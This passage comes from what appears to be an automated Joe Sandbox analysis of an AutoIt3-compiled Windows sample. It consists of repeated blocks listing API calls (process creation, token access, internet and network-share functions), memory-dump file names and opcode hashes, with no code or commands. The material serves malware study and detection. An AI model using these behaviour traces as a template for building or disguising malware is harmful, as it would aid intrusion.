                                                                  • ScreenToClient.USER32(?,?), ref: 0097B2FC
                                                                  • ScreenToClient.USER32(?,?), ref: 0097B320
                                                                  • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0097B33B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ClientRectScreen$InvalidateWindow
                                                                  • String ID:
                                                                  • API String ID: 357397906-0
                                                                  • Opcode ID: 368cab6b65918a5d29c2eff58f7999fc9e76f6080c56fbf1e10c26447484d066
                                                                  • Instruction ID: 3dd6282d1a50bab0dfff8fd980cbfd83e0068f4f8dc98284e11b8b8a3c44d796
                                                                  • Opcode Fuzzy Hash: 368cab6b65918a5d29c2eff58f7999fc9e76f6080c56fbf1e10c26447484d066
                                                                  • Instruction Fuzzy Hash: CA114675D0420DEFDB41DF99C844AEEBBB9FB08310F108166E914E3220D735AA559F50
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 0097B644
                                                                  • _memset.LIBCMT ref: 0097B653
                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,009B6F20,009B6F64), ref: 0097B682
                                                                  • CloseHandle.KERNEL32 ref: 0097B694
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: _memset$CloseCreateHandleProcess
                                                                  • String ID:
                                                                  • API String ID: 3277943733-0
                                                                  • Opcode ID: abdab458516fa89e1d06db4d7f921379617d8792e4a042776fd03980c479b75e
                                                                  • Instruction ID: 14c2df24409ee96eed3567434b65ca5331ab487b6d994d0d62b4cf72c58fa57b
                                                                  • Opcode Fuzzy Hash: abdab458516fa89e1d06db4d7f921379617d8792e4a042776fd03980c479b75e
                                                                  • Instruction Fuzzy Hash: F9F05EB36543047AE3102B61BD06FBB3A9CEB083A5F004020FA0CEA192D7796C10D7A8
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(?), ref: 00956BE6
                                                                    • Part of subcall function 009576C4: _memset.LIBCMT ref: 009576F9
                                                                  • _memmove.LIBCMT ref: 00956C09
                                                                  • _memset.LIBCMT ref: 00956C16
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00956C26
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                  • String ID:
                                                                  • API String ID: 48991266-0
                                                                  • Opcode ID: 883c88e2cf006e665760522a04b7cd4a99ecdca1e57036ea0c890e640459c661
                                                                  • Instruction ID: ddcbb28d0445f1adb61b6ee81e09dda9af179916121db179f192bd1d1dbdbc92
                                                                  • Opcode Fuzzy Hash: 883c88e2cf006e665760522a04b7cd4a99ecdca1e57036ea0c890e640459c661
                                                                  • Instruction Fuzzy Hash: 52F0543A204104ABCF016F55EC85B8ABF29EF85321F048061FE0CAE267C731E951DBB4
                                                                  APIs
                                                                  • GetSysColor.USER32(00000008), ref: 008F2231
                                                                  • SetTextColor.GDI32(?,000000FF), ref: 008F223B
                                                                  • SetBkMode.GDI32(?,00000001), ref: 008F2250
                                                                  • GetStockObject.GDI32(00000005), ref: 008F2258
                                                                  • GetWindowDC.USER32(?,00000000), ref: 0092BE83
                                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 0092BE90
                                                                  • GetPixel.GDI32(00000000,?,00000000), ref: 0092BEA9
                                                                  • GetPixel.GDI32(00000000,00000000,?), ref: 0092BEC2
                                                                  • GetPixel.GDI32(00000000,?,?), ref: 0092BEE2
                                                                  • ReleaseDC.USER32(?,00000000), ref: 0092BEED
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                  • String ID:
                                                                  • API String ID: 1946975507-0
                                                                  • Opcode ID: 7488338550c4b7119091f892c660731b18b76b977e3caefa182f8b1491af80b1
                                                                  • Instruction ID: af55ee285c5d042fbe2e7f64a653945f84549bbff97190187e57286033575558
                                                                  • Opcode Fuzzy Hash: 7488338550c4b7119091f892c660731b18b76b977e3caefa182f8b1491af80b1
                                                                  • Instruction Fuzzy Hash: 78E03932218244AADF215F64FC0D7E83B24EB05336F108366FA6DA80E5877149C4EB12
                                                                  APIs
                                                                  • GetCurrentThread.KERNEL32 ref: 0094871B
                                                                  • OpenThreadToken.ADVAPI32(00000000,?,?,?,009482E6), ref: 00948722
                                                                  • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,009482E6), ref: 0094872F
                                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,009482E6), ref: 00948736
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentOpenProcessThreadToken
                                                                  • String ID:
                                                                  • API String ID: 3974789173-0
                                                                  • Opcode ID: 1f0538c2e8a2e9e37be1f26a1e2212f781bbdddd6407b59400364622deb07986
                                                                  • Instruction ID: e78573ae375c562aa8220e4466332d8ae77bb766c1fe9fc24e5d0b498bbc557d
                                                                  • Opcode Fuzzy Hash: 1f0538c2e8a2e9e37be1f26a1e2212f781bbdddd6407b59400364622deb07986
                                                                  • Instruction Fuzzy Hash: 8FE086376292119BD7205FB05D1CF5B3BACEF50BD1F144828F249EA040DA348485D750
                                                                  APIs
                                                                  • OleSetContainedObject.OLE32(?,00000001), ref: 0094B4BE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ContainedObject
                                                                  • String ID: AutoIt3GUI$Container
                                                                  • API String ID: 3565006973-3941886329
                                                                  • Opcode ID: 6f30b18e3093632cee5add29cc599c9fe3e0da60f0c16e49ed9374ca11fbf53b
                                                                  • Instruction ID: 6f39da5b38bafa92db3b56e0aea2c1675942850254ae2515a158eaffb528488d
                                                                  • Opcode Fuzzy Hash: 6f30b18e3093632cee5add29cc599c9fe3e0da60f0c16e49ed9374ca11fbf53b
                                                                  • Instruction Fuzzy Hash: CA912570600601AFDB14DF68C885F6ABBE9FF49710F24856DF94ACB6A1DB71E841CB60
                                                                  APIs
                                                                    • Part of subcall function 0090FC86: _wcscpy.LIBCMT ref: 0090FCA9
                                                                    • Part of subcall function 008F9837: __itow.LIBCMT ref: 008F9862
                                                                    • Part of subcall function 008F9837: __swprintf.LIBCMT ref: 008F98AC
                                                                  • __wcsnicmp.LIBCMT ref: 0095B02D
                                                                  • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0095B0F6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                  • String ID: LPT
                                                                  • API String ID: 3222508074-1350329615
                                                                  • Opcode ID: 3da4a25065fa6a6069cc9e2cee6d819dc63b806fc57c1a171f708a24ea1a37f2
                                                                  • Instruction ID: 77788b59b4b758a18e74c3ddf56d2c129c893c0226a2e009f7a85c1d313c6dd8
                                                                  • Opcode Fuzzy Hash: 3da4a25065fa6a6069cc9e2cee6d819dc63b806fc57c1a171f708a24ea1a37f2
                                                                  • Instruction Fuzzy Hash: 8961A471A04219AFCB14DFA9D891FBEB7B8FF48310F104069F956AB291D770AE84CB51
                                                                  APIs
                                                                  • Sleep.KERNEL32(00000000), ref: 00902968
                                                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 00902981
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: GlobalMemorySleepStatus
                                                                  • String ID: @
                                                                  • API String ID: 2783356886-2766056989
                                                                  • Opcode ID: b7ec982fc1d9b1b6df14b96818d8230d010f7491db611f5f1cc923866c29fecd
                                                                  • Instruction ID: db596fd7c9bd3e3b21d28cd1a57cb24ad8cb5e392859a1fe4c993d545e8c12e9
                                                                  • Opcode Fuzzy Hash: b7ec982fc1d9b1b6df14b96818d8230d010f7491db611f5f1cc923866c29fecd
                                                                  • Instruction Fuzzy Hash: F85149724187489BD720EF24D886BAFBBE8FF85344F42485DF2D8810A1DB318569CB67
                                                                  APIs
                                                                    • Part of subcall function 008F4F0B: __fread_nolock.LIBCMT ref: 008F4F29
                                                                  • _wcscmp.LIBCMT ref: 00959824
                                                                  • _wcscmp.LIBCMT ref: 00959837
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscmp$__fread_nolock
                                                                  • String ID: FILE
                                                                  • API String ID: 4029003684-3121273764
                                                                  • Opcode ID: 90aec90ef5f027637790acf8a6063f50cb53539653990bafacbc7d1521a7da80
                                                                  • Instruction ID: fda292729a31b37378182d4a1c57634df2ad554f4dd15238256c3646fc31fcb1
                                                                  • Opcode Fuzzy Hash: 90aec90ef5f027637790acf8a6063f50cb53539653990bafacbc7d1521a7da80
                                                                  • Instruction Fuzzy Hash: 7941D931A0421DBAEF21DBA5CC45FEFB7BDEF85710F00046AFA05E7181DA7199048B61
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 0096259E
                                                                  • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 009625D4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: CrackInternet_memset
                                                                  • String ID: |
                                                                  • API String ID: 1413715105-2343686810
                                                                  • Opcode ID: 06405bd8a00a38f18ca69353aa9142e6ca680c317f20a73aebdd1522f8ec04f1
                                                                  • Instruction ID: 2a32aebc2d8a7605f6b6fb18ca8425ce1b9c9f70481d29378f22c7576a73dd50
                                                                  • Opcode Fuzzy Hash: 06405bd8a00a38f18ca69353aa9142e6ca680c317f20a73aebdd1522f8ec04f1
                                                                  • Instruction Fuzzy Hash: 8331F471814119EBDF11AFA4CC85EEEBFB8FF08310F10006AFA15A6162EA355966DB61
APIs
• SendMessageW.USER32(?,00001132,00000000,?), ref: 00977B61
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00977B76
Strings
Memory Dump Source
• Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
• Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
Similarity
• API ID: MessageSend
• String ID: '
• API String ID: 3850602802-1997036262
• Opcode ID: 333b890c33ac3f2ba371d8ee13942928574b1024821d6315328c5c8cfb23c891
• Instruction ID: 3fd2e8ec6edd75bc3484cd1f570b44be6005b0a7c86c4479d4a6bc18d8d29814
• Opcode Fuzzy Hash: 333b890c33ac3f2ba371d8ee13942928574b1024821d6315328c5c8cfb23c891
• Instruction Fuzzy Hash: 58411975A053099FDB14CFA4C981BEABBB9FF08300F10456AE908EB351D770A951CF90
APIs
• DestroyWindow.USER32(?,?,?,?), ref: 00976B17
• MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00976B53
Strings
Memory Dump Source
• Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
• Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
Similarity
• API ID: Window$DestroyMove
• String ID: static
• API String ID: 2139405536-2160076837
• Opcode ID: ee1d11ed429fb12a29a07c3631b49f89bfffda76c1e16b35b10261a0a941d198
• Instruction ID: 6ead2ab677902119114e99fb388685aca4dfa1d13afb7b58b94c802cc2c48dab
• Opcode Fuzzy Hash: ee1d11ed429fb12a29a07c3631b49f89bfffda76c1e16b35b10261a0a941d198
• Instruction Fuzzy Hash: 10318E72210608AEDB149F68CC91BBB77ADFF49760F10C619F9A9D7190DA30AC81DB60
APIs
• _memset.LIBCMT ref: 00952911
• GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0095294C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
• Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
Similarity
• API ID: InfoItemMenu_memset
• String ID: 0
• API String ID: 2223754486-4108050209
• Opcode ID: 18c836de4614e142e331fb519f59a13e6d24b04667081de7f87c845484d4f028
• Instruction ID: 98458777201de20dffd1e23c3ad1a281e13879d5c613ff6ea6ae41d2c814236d
• Opcode Fuzzy Hash: 18c836de4614e142e331fb519f59a13e6d24b04667081de7f87c845484d4f028
• Instruction Fuzzy Hash: F331D7756003099BDB24CF9ADA45BEEBBFCEF46351F140019ED85A62A0D7709948CB51
APIs
• __snwprintf.LIBCMT ref: 00963A66
  • Part of subcall function 008F7DE1: _memmove.LIBCMT ref: 008F7E22
Strings
Memory Dump Source
• Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
• Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
Similarity
• API ID: __snwprintf_memmove
• String ID: , $$AUTOITCALLVARIABLE%d
• API String ID: 3506404897-2584243854
• Opcode ID: d84e3c053012345ec7d57b02cbe94fac248941d4ac5ed5bf3c01228d457194f5
• Instruction ID: bffed1e8df571d2772eb3e954a6a5652ad8890181a3a9c7eeab92dfa3e95c4a4
• Opcode Fuzzy Hash: d84e3c053012345ec7d57b02cbe94fac248941d4ac5ed5bf3c01228d457194f5
• Instruction Fuzzy Hash: 12218F31A0421DAACF10EFA8CC92EAE77B9FF85300F404455E545E7181DB30EA45DBA2
APIs
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00976761
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0097676C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
• Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
Similarity
• API ID: MessageSend
• String ID: Combobox
• API String ID: 3850602802-2096851135
• Opcode ID: 6cc462f90c28a056fed23c3de7bafbc390e6f55d11e1e9fcdbac0c408d9ada42
• Instruction ID: ca16f8af27939931cd8598cf2cd1f9568151da1930f0f4f18d0f74d1b4548b77
• Opcode Fuzzy Hash: 6cc462f90c28a056fed23c3de7bafbc390e6f55d11e1e9fcdbac0c408d9ada42
• Instruction Fuzzy Hash: 2011B272300609AFEF199F54CC81EBB3B6EEB883A8F108129F91897290D6319C5187A0
APIs
  • Part of subcall function 008F1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 008F1D73
  • Part of subcall function 008F1D35: GetStockObject.GDI32(00000011), ref: 008F1D87
  • Part of subcall function 008F1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 008F1D91
• GetWindowRect.USER32(00000000,?), ref: 00976C71
• GetSysColor.USER32(00000012), ref: 00976C8B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
• Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
Similarity
• API ID: Window$ColorCreateMessageObjectRectSendStock
• String ID: static
• API String ID: 1983116058-2160076837
• Opcode ID: c7170ba32bef7caa99550b82ce5c633e9f1b2ecae205a19b46808956cdd637db
• Instruction ID: f11ae7a55cb942bc440caa94e49c50bfe3cd76913dc1fa8ef2ce014043e65b25
• Opcode Fuzzy Hash: c7170ba32bef7caa99550b82ce5c633e9f1b2ecae205a19b46808956cdd637db
• Instruction Fuzzy Hash: A0212C72614209AFDF05DFB8CC46AFA7BB8FB08314F044629FA99E2250D635E850DB60
APIs
• GetWindowTextLengthW.USER32(00000000), ref: 009769A2
• SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 009769B1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
• Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
Similarity
• API ID: LengthMessageSendTextWindow
• String ID: edit
• API String ID: 2978978980-2167791130
• Opcode ID: 5aed2997855246877e650788a7001f516959eb495670aad53453b899ba40cd07
• Instruction ID: fb6122dacd10c4bb1cde061cba0ed1ad383885b75f7ce45da441962374083a62
• Opcode Fuzzy Hash: 5aed2997855246877e650788a7001f516959eb495670aad53453b899ba40cd07
• Instruction Fuzzy Hash: 6A118F72110608ABEF108E74DC55AFB3B6DEB453B8F508724FAA9A71E0C735DC90A760
APIs
• _memset.LIBCMT ref: 00952A22
• GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00952A41
Strings
Memory Dump Source
• Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
• Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
Similarity
• API ID: InfoItemMenu_memset
• String ID: 0
• API String ID: 2223754486-4108050209
• Opcode ID: dccacd415255ace89cedb2d870d80cd26ba8059e90cfd799ea5339574c616686
• Instruction ID: 3dc5a8c001c5df24dbe1921bd24ea01ad06a443bc8d2ba8eeb68aa10a056d8f4
• Opcode Fuzzy Hash: dccacd415255ace89cedb2d870d80cd26ba8059e90cfd799ea5339574c616686
• Instruction Fuzzy Hash: 0A11D032A15214ABCF35EB99ED44BAA73ACAB46311F054121ED59E72D0D730AD0EC791
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0096222C
• InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00962255
Strings
Memory Dump Source
• Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
• Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
